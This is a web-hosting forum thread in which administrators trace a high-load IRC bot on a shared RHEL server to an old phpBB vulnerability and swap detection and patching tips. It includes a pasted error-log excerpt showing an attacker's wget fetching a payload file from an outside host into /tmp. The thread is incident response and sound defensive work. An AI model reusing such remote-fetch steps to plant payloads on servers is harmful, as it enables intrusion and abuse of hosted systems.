I found that over the last 3 days my RHEL 3.0 server w/ many virtual hosts has had a high load. perl is the culprit when viewing with top. Someone on my server is using an irc bot as when I run lsof -i |grep perl I get: ftp.pqa.com:ircd

How do I determine which site I host is running this?
It just shows apache as the owner of the process.

Assistance in determining the source site appreciated.

Gus

That's one of the many, many reasons you never give shell access to clients.

grep -R your vhosts dir for a partial of the bot process name and see if that turns it up. If that don't find it grep for irc or bot.

Probably a better way but nothing else comes to mind right now.

Rick

Doing so now. The strange thing though, is that it is running as user apache.
So its like it is an uploaded perl script. Not a shell run ./ one.

Thoughts? Is there such a web based irc bot?

Thank you

None that I specifically know of but that means nothing. That type of operation would explain unusually high loads if it is doing a lot of http updating to a web page, generally IRC bots are not cpu intensive.

After thuinking about it for a min, it has to be a perl script if that's what it's using. Grepping for it should still find the thing but it might take awhile if you have a lot of clients.

Rick

If it's a perl script it will be in the suexec log.

nothing in the suexec log

Other thoughts? This is really hard to nail down. Nothing grepping for ircd in the entire vhosts directory either.

Not sure if it will help you in this exact case, but I have Webmin installed on my server (alongside Plesk). One of the neat features of it is a webpage-based listing of running processes... but when you click on the process PID, it will let you access a further list of files that are being accessed by it.
Likely, if the bot is executed with perl, it will show up in that listing.

ircd wrong keyword

grep irc /home/httpd/vhosts/*/cgi-bin/*
grep bot /home/httpd/vhosts/*/cgi-bin/*

assuming there is probably an "irc" or "bot" string in the script somewhere.

OK, I found a file in my /tmp called d0s3.txt

Here is the log file from error_log.1

--19:21:21-- http://@#!@#!@#!@#!yeah.freesuperhost.com/d0s3.txt
=> `d0s3.txt'
Resolving @#!@#!@#!@#!yeah.freesuperhost.com... done.
Connecting to @#!@#!@#!@#!yeah.freesuperhost.com[70.84.229.131]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,419 [text/plain]

0K .......... ......... 100% 74.68 KB/s

19:21:23 (74.68 KB/s) - `d0s3.txt' saved [20419/20419]


How do I find out who did this I wonder?

security hole somewhere, probably still open. Seen several reports of the phpBB pre-2.0.11 hack writing and executing files in tmp dir. There are posts in the forum about securing that and other dirs too, do a search.

You may wish to install suphp which will force php scripts to run like suexec does with perl. This has alot of security advantages and also aids in tracking down problem users. Here is a how to I wrote for it.

http://devzone.helixdevelopment.com/cms/in...id=16&Itemid=42

This is wrong question. Right is the WHY some one can do it on my server?
The answer is - you server was UNSECURED.

You can read a lot of books about server security [mod edit]spam deleted. No spam please[/mod edit]Is you choise?

I can suggest some books on the English language if you like.

The exploit actually came from a user who was running a pre 2.0.11 version phpbb.

Nasty exploit. So Unsecured? Not really. Its hard to monitor all software being used by people you host.

So eSupport.org.ua, you have no idea what you are talking about. Thanks for comming out though. That was some valuable info about what questions are valid.

There's a small piece of code you can run from SSH that will scan your server, and rewrite all the exploitable files to patch them...
I ran the fix, and it seemed to work for me. Might be something to look into.

Where can we get that code? Sounds handy.

Thanks

Just so you know I'm looking...
It's in the General section, I think... 1 sec, I'll go grab it, and edit my post to include it.

Found it... had to dig a bt.
http://forum.ev1servers.net/showthread.php...t=viewtopic.php

If you have mod_security installed (I suggest slapping it on your server anyway, just because of how well it can secure some exploits), there's a patch you can load into that as well.

NightStorm,

Thank you. That is excellent.

Mark

I agree that the biggest security risk is hosting people! No matter what you do it seems like there is always something a user can screw up on to leave you open to a broadside.

phpBB is a fine package, it really is. I do have a problem with their not having a security mailing list though. With a project and userbase that size it is nothing short of irresponsible not having a security listserv setup.

We caught an exploit in process via other monitoring we have in place the day the exploit went into the wild. It took a trip to the phpBB board to find the patch and then as we always do, I upgraded all instances running on our servers. You just can't trust users to be watchful or prompt about upgrading scripts and since phpBB is such a big target, it is exploited quite frequently.

There were several threads about them starting a security listserv in their forum but they are slow to act and have not promised anything yet. Checking their board multiple times daily is not an option so if they don't introduce a mailing list soon, we are just going to flat out ban phpBB from our servers.

To get to the point, one thing we do is cron a script that looks for installations of phpBB and other commonly exploited scripts every night. I explained that here...

http://forum.ev1servers.net/showthread.php...&threadid=51203

It isn't perfect but at least we know who is running the most dangerous stuff and can notify them the instant a security patch is released. If it is a package we use on one of our own domains like phpBB or osCommerce, we just upgrade everyone who has it installed when we do ours.

Rick

That looks great agruetz, how does it play with Plesk? It always scares me to fool with server wide setting for php or any other packages Plesk integrates. Is it likely to cause problems with Plesk upgrades?

Rick

One of the worst things I've seen thus far is a user that creates his own php script (a very nice one, at that) that uses MySQL for data storage.
It worked beautifully, except that the user coding it put in a string to open the connection to MySQL, but did not close the connection at the end of the script.
The page ended up getting upwards of 10,000 hits a day... now, you do the math and imagine the impact of 10,000 improperly opened MySQL sockets sitting there lingering, because the script that called them failed to properly close them at the end.